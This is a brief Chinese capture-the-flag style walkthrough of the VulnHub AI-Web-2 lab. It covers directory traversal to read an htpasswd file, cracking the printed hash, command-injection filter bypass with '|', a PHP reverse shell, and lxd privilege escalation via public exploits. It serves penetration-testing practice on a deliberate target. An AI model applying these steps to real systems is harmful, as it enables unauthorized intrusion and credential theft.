靶機下載鏈接:
https://www.vulnhub.com/entry/ai-web-2,357
主機埠掃描:
嘗試SQL注入,未發現有注入漏洞,就注冊創建于一賬戶
http://10.10.202.160/userpage.php
漏洞庫搜索下:
XuezhuLi FileSharing - Directory Traversal
https://www.exploit-db.com/exploits/40009
我們爆破下目錄看下
╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e .php
我們嘗試包含下Apache的認證檔案看看
aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd
aiweb2admin:c.ronaldo
經過嘗試&& ; | 發現| 可以繞過執行命令
訪問:http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php
接下來進行提權操作:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh
╰─ searchsploit lxd
創建hack.sh 檔案,拷貝如下鏈接的腳本內容到hack.sh
https://www.exploit-db.com/exploits/46978
OVER !!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/124255.html
標籤:其他